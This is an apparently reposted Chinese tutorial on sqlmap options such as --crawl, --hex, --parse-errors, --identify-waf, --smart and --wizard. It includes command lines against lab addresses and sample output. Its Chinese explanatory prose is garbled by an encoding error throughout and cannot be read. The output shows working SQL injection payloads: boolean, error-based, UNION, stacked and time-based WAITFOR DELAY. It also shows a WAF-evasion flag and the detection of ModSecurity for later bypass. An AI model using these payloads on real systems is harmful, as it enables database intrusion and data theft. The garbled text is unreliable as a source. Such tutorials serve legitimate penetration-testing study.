sqlmap瀵规瘡涓�涓洰鏍囬兘浼氬湪output璺緞涓嬭嚜鍔ㄧ敓鎴愪竴涓猄QLite鏂囦欢锛屽鏋滅敤鎴锋兂鎸囧畾璇诲彇鐨勬枃浠惰矾寰勶紝灏卞彲浠ョ敤杩欎釜鍙傛暟銆�

淇濆瓨HTTP(S)鏃ュ織

鍙傛暟锛�-t

杩欎釜鍙傛暟闇�瑕佽窡涓�涓枃鏈枃浠讹紝sqlmap浼氭妸HTTP(S)璇锋眰涓庡搷搴旂殑鏃ュ織淇濆瓨鍒伴偅閲屻��

闈炰氦浜掓ā寮�

鍙傛暟锛�--batch

鐢ㄦ鍙傛暟锛屼笉闇�瑕佺敤鎴疯緭鍏ワ紝灏嗕細浣跨敤sqlmap鎻愮ず鐨勯粯璁ゅ�间竴鐩磋繍琛屼笅鍘汇��

寮哄埗浣跨敤瀛楃缂栫爜

鍙傛暟锛�--charset

涓嶄娇鐢╯qlmap鑷姩璇嗗埆鐨勶紙濡侶TTP澶翠腑鐨凜ontent-Type锛夊瓧绗︾紪鐮侊紝寮哄埗鎸囧畾瀛楃缂栫爜濡傦細

--charset=GBK

鐖缃戠珯URL

鍙傛暟锛�--crawl

sqlmap鍙互鏀堕泦娼滃湪鐨勫彲鑳藉瓨鍦ㄦ紡娲炵殑杩炴帴锛屽悗闈㈣窡鐨勫弬鏁版槸鐖鐨勬繁搴︺��

渚嬪瓙锛�

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3

[...]

[xx:xx:53] [INFO] starting crawler

[xx:xx:53] [INFO] searching for links with depth 1

[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while

[xx:xx:53] [INFO] searching for links with depth 2

[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'

[xx:xx:00] [INFO] 42/56 links visited (75%)

[...]

瑙勫畾杈撳嚭鍒癈SV涓殑鍒嗛殧绗�

鍙傛暟锛�--csv-del

褰揹ump淇濆瓨涓篊SV鏍煎紡鏃讹紙--dump-format=CSV锛夛紝闇�瑕佷竴涓垎闅旂榛樿鏄�楀彿锛岀敤鎴蜂篃鍙互鏀逛负鍒殑 濡傦細

--csv-del=";"

DBMS韬唤楠岃瘉

鍙傛暟锛�--dbms-cred

鏌愪簺鏃跺�欏綋鍓嶇敤鎴风殑鏉冮檺涓嶅锛屽仛鏌愪簺鎿嶄綔浼氬け璐ワ紝濡傛灉鐭ラ亾楂樻潈闄愮敤鎴风殑瀵嗙爜锛屽彲浠ヤ娇鐢ㄦ鍙傛暟锛屾湁鐨勬暟鎹簱鏈変笓闂ㄧ殑杩愯鏈哄埗锛屽彲浠ュ垏鎹㈢敤鎴峰Microsoft SQL Server鐨凮PENROWSET鍑芥暟

瀹氫箟dump鏁版嵁鐨勬牸寮�

鍙傛暟锛�--dump-format

杈撳嚭鐨勬牸寮忓彲瀹氫箟涓猴細CSV锛孒TML锛孲QLITE

棰勪及瀹屾垚鏃堕棿

鍙傛暟锛�--eta

鍙互璁＄畻娉ㄥ叆鏁版嵁鐨勫墿浣欐椂闂淬��

渚嬪Oracle鐨勫竷灏斿瀷鐩叉敞锛�

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta

[...]

[hh:mm:01] [INFO] the back-end DBMS is Oracle

[hh:mm:01] [INFO] fetching banner

[hh:mm:01] [INFO] retrieving the length of query output

[hh:mm:01] [INFO] retrieved: 64

17% [========>聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ] 11/64聽 ETA 00:19

鐒跺悗锛�

100% [===================================================] 64/64

[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: Oracle

banner:聽聽聽 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'

sqlmap鍏堣緭鍑洪暱搴︼紝棰勮瀹屾垚鏃堕棿锛屾樉绀虹櫨鍒嗘瘮锛岃緭鍑哄瓧绗�

鍒锋柊session鏂囦欢

鍙傛暟锛�--flush-session

濡傛灉涓嶆兂鐢ㄤ箣鍓嶇紦瀛樿繖涓洰鏍囩殑session鏂囦欢锛屽彲浠ヤ娇鐢ㄨ繖涓弬鏁般�� 浼氭竻绌轰箣鍓嶇殑session锛岄噸鏂版祴璇曡鐩爣銆�

鑷姩鑾峰彇form琛ㄥ崟娴嬭瘯

鍙傛暟锛�--forms

濡傛灉浣犳兂瀵逛竴涓〉闈㈢殑form琛ㄥ崟涓殑鍙傛暟娴嬭瘯锛屽彲浠ヤ娇鐢�-r鍙傛暟璇诲彇璇锋眰鏂囦欢锛屾垨鑰呴�氳繃--data鍙傛暟娴嬭瘯銆� 浣嗘槸褰撲娇鐢�--forms鍙傛暟鏃讹紝sqlmap浼氳嚜鍔ㄤ粠-u涓殑url鑾峰彇椤甸潰涓殑琛ㄥ崟杩涜娴嬭瘯銆�

蹇界暐鍦ㄤ細璇濇枃浠朵腑瀛樺偍鐨勬煡璇㈢粨鏋�

鍙傛暟锛�--fresh-queries

蹇界暐session鏂囦欢淇濆瓨鐨勬煡璇紝閲嶆柊鏌ヨ銆�

浣跨敤DBMS鐨刪ex鍑芥暟

鍙傛暟锛�--hex

鏈夋椂鍊欏瓧绗︾紪鐮佺殑闂锛屽彲鑳藉鑷存暟鎹涪澶憋紝鍙互浣跨敤hex鍑芥暟鏉ラ伩鍏嶏細

閽堝PostgreSQL渚嬪瓙锛�

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors

[...]

[xx:xx:14] [INFO] fetching banner

[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)

[xx:xx:15] [INFO] parsed error message: 'pg_query() [function.pg-query]: Query failed: ERROR:聽 invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in /var/www/sqlmap/libs/pgsql.inc.php on line 35'

[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by

GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2

[...]

鑷畾涔夎緭鍑虹殑璺緞

鍙傛暟锛�--output-dir

sqlmap榛樿鎶妔ession鏂囦欢璺熺粨鏋滄枃浠朵繚瀛樺湪output鏂囦欢澶逛笅锛岀敤姝ゅ弬鏁板彲鑷畾涔夎緭鍑鸿矾寰� 渚嬪锛�--output-dir=/tmp

浠庡搷搴斾腑鑾峰彇DBMS鐨勯敊璇俊鎭�

鍙傛暟锛�--parse-errors

鏈夋椂鐩爣娌℃湁鍏抽棴DBMS鐨勬姤閿欙紝褰撴暟鎹簱璇彞閿欒鏃讹紝浼氳緭鍑洪敊璇鍙ワ紝鐢ㄨ瘝鍙傛暟鍙互浼氭樉鍑洪敊璇俊鎭��

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors

[...]

[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test

[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)

[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.

/sqlmap/mssql/iis/get_int.asp, line 27'

[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)

[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.

/sqlmap/mssql/iis/get_int.asp, line 27'

[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)

[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.

/sqlmap/mssql/iis/get_int.asp, line 27'

[11:12:17] [INFO] target URL appears to have 3 columns in query

[...]

鍏朵粬鐨勪竴浜涘弬鏁�

浣跨敤鍙傛暟缂╁啓

鍙傛暟锛�-z

鏈変娇鐢ㄥ弬鏁板お闀垮お澶嶆潅锛屽彲浠ヤ娇鐢ㄧ缉鍐欐ā寮忋�� 渚嬪锛�

python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"

鍙互鍐欐垚锛�

python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"

杩樻湁锛�

python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"

鍙互鍐欐垚锛�

python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"

鎴愬姛SQL娉ㄥ叆鏃惰鍛�

鍙傛暟锛�--alert

璁惧畾浼氬彂鐨勭瓟妗�

鍙傛暟锛�--answers

褰撳笇鏈泂qlmap鎻愬嚭杈撳叆鏃讹紝鑷姩杈撳叆鑷繁鎯宠鐨勭瓟妗堝彲浠ヤ娇鐢ㄦ鍙傛暟锛� 渚嬪瓙锛�

$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--technique=E --answers="extending=N" --batch

[...]

[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'

heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y

[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N

[...]

鍙戠幇SQL娉ㄥ叆鏃跺彂鍑鸿渹楦ｅ０

鍙傛暟锛�--beep

鍙戠幇sql娉ㄥ叆鏃讹紝鍙戝嚭铚傞福澹般��

鍚彂寮忔娴媁AF/IPS/IDS淇濇姢

鍙傛暟锛�--check-waf

WAF/IPS/IDS淇濇姢鍙兘浼氬sqlmap閫犳垚寰堝ぇ鐨勫洶鎵帮紝濡傛灉鎬�鐤戠洰鏍囨湁姝ら槻鎶ょ殑璇濓紝鍙互浣跨敤姝ゅ弬鏁版潵娴嬭瘯銆� sqlmap灏嗕細浣跨敤涓�涓笉瀛樺湪鐨勫弬鏁版潵娉ㄥ叆娴嬭瘯

渚嬪锛�

&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1

濡傛灉鏈変繚鎶ょ殑璇濆彲鑳借繑鍥炵粨鏋滀細涓嶅悓銆�

娓呯悊sqlmap鐨刄DF(s)鍜岃〃

鍙傛暟锛�--cleanup

娓呴櫎sqlmap娉ㄥ叆鏃朵骇鐢熺殑udf涓庤〃銆�

绂佺敤褰╄壊杈撳嚭

鍙傛暟锛�--disable-coloring

sqlmap榛樿褰╄壊杈撳嚭锛屽彲浠ヤ娇鐢ㄦ鍙傛暟锛岀鎺夊僵鑹茶緭鍑恒��

浣跨敤鎸囧畾鐨凣oogle缁撴灉椤甸潰

鍙傛暟锛�--gpage

榛樿sqlmap浣跨敤鍓�100涓猆RL鍦板潃浣滀负娉ㄥ叆娴嬭瘯锛岀粨鍚堟閫夐」锛屽彲浠ユ寚瀹氶〉闈㈢殑URL娴嬭瘯銆�

浣跨敤HTTP鍙傛暟姹℃煋

鍙傛暟锛�-hpp

HTTP鍙傛暟姹℃煋鍙兘浼氱粫杩嘩AF/IPS/IDS淇濇姢鏈哄埗锛岃繖涓ASP/IIS涓嶢SP.NET/IIS骞冲彴寰堟湁鏁堛��

娴嬭瘯WAF/IPS/IDS淇濇姢

鍙傛暟锛�--identify-waf

sqlmap鍙互灏濊瘯鎵惧嚭WAF/IPS/IDS淇濇姢锛屾柟渚跨敤鎴峰仛鍑虹粫杩囨柟寮忋�傜洰鍓嶅ぇ绾︽敮鎸�30绉嶄骇鍝佺殑璇嗗埆銆�

渚嬪瀵逛竴涓彈鍒癕odSecurity WAF淇濇姢鐨凪ySQL渚嬪瓙锛�

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3

[...]

[xx:xx:23] [INFO] testing connection to the target URL

[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'

[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'

[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'

[xx:xx:23] [DEBUG] page not found (404)

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'

[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')

[...]

妯′豢鏅鸿兘鎵嬫満

鍙傛暟锛�--mobile

鏈夋椂鏈嶅姟绔彧鎺ユ敹绉诲姩绔殑璁块棶锛屾鏃跺彲浠ヨ瀹氫竴涓墜鏈虹殑User-Agent鏉ユā浠挎墜鏈虹櫥闄嗐��

渚嬪锛�

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile

[...]

which smartphone do you want sqlmap to imitate through HTTP User-Agent header?

[1] Apple iPhone 4s (default)

[2] BlackBerry 9900

[3] Google Nexus 7

[4] HP iPAQ 6365

[5] HTC Sensation

[6] Nokia N97

[7] Samsung Galaxy S

> 1

[...]

瀹夊叏鐨勫垹闄utput鐩綍鐨勬枃浠�

鍙傛暟锛�--purge-output

鏈夋椂闇�瑕佸垹闄ょ粨鏋滄枃浠讹紝鑰屼笉琚仮澶嶏紝鍙互浣跨敤姝ゅ弬鏁帮紝鍘熸湁鏂囦欢灏嗕細琚殢鏈虹殑涓�浜涙枃浠惰鐩栥��

渚嬪锛�

$ python sqlmap.py --purge-output -v 3

[...]

[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...

[xx:xx:55] [DEBUG] changing file attributes

[xx:xx:55] [DEBUG] writing random data to files

[xx:xx:55] [DEBUG] truncating files

[xx:xx:55] [DEBUG] renaming filenames to random values

[xx:xx:55] [DEBUG] renaming directory names to random values

[xx:xx:55] [DEBUG] deleting the whole directory tree

[...]

鍚彂寮忓垽鏂敞鍏�

鍙傛暟锛�--smart

鏈夋椂瀵圭洰鏍囬潪甯稿鐨刄RL杩涜娴嬭瘯锛屼负鑺傜渷鏃堕棿锛屽彧瀵硅兘澶熷揩閫熷垽鏂负娉ㄥ叆鐨勬姤閿欑偣杩涜娉ㄥ叆锛屽彲浠ヤ娇鐢ㄦ鍙傛暟銆�

渚嬪瓙锛�

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart

[...]

[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic

[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic

[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable

[xx:xx:14] [INFO] skipping GET parameter 'ca'

[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic

[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic

[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable

[xx:xx:14] [INFO] skipping GET parameter 'user'

[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic

[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic

[xx:xx:14] [INFO] GET parameter 'id' is dynamic

[xx:xx:14] [WARNING] reflective value(s) found and filtering out

[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')

[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'

heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y

do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y

[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable

[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable

[xx:xx:14] [INFO] testing 'MySQL inline queries'

[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'

[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable

[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'

[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found

[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test

[xx:xx:24] [INFO] target URL appears to have 3 columns in query

[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable

[...]

鍒濈骇鐢ㄦ埛鍚戝鍙傛暟

鍙傛暟锛�--wizard 闈㈠悜鍒濈骇鐢ㄦ埛鐨勫弬鏁帮紝鍙互涓�姝ヤ竴姝ユ暀浣犲浣曡緭鍏ラ拡瀵圭洰鏍囨敞鍏ャ��

$ python sqlmap.py --wizard

sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:25:26

Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1

POST data (--data) [Enter for None]:

Injection difficulty (--level/--risk). Please choose:

[1] Normal (default)

[2] Medium

[3] Hard

> 1

Enumeration (--banner/--current-user/etc). Please choose:

[1] Basic (default)

[2] Smart

[3] All

> 1

sqlmap is running, please wait..

heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y

do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

sqlmap identified the following injection points with a total of 25 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1 AND 2986=2986

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)))

Type: UNION query

Title: Generic UNION query (NULL) - 3 columns

Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)--

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: id=1; WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: id=1 WAITFOR DELAY '0:0:5'--

Type: inline query

Title: Microsoft SQL Server/Sybase inline queries

Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))

---

web server operating system: Windows XP

web application technology: ASP, Microsoft IIS 5.1

back-end DBMS operating system: Windows XP Service Pack 2

back-end DBMS: Microsoft SQL Server 2005

banner:

---

Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)

Oct 14 2005 00:33:37

Copyright (c) 1988-2005 Microsoft Corporation

Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)

---

current user:聽聽聽 'sa'

current database:聽聽聽 'testdb'

current user is DBA:聽聽聽 True

[*] shutting down at 11:25:52

杞浇鑷細http://drops.wooyun.org/tips/143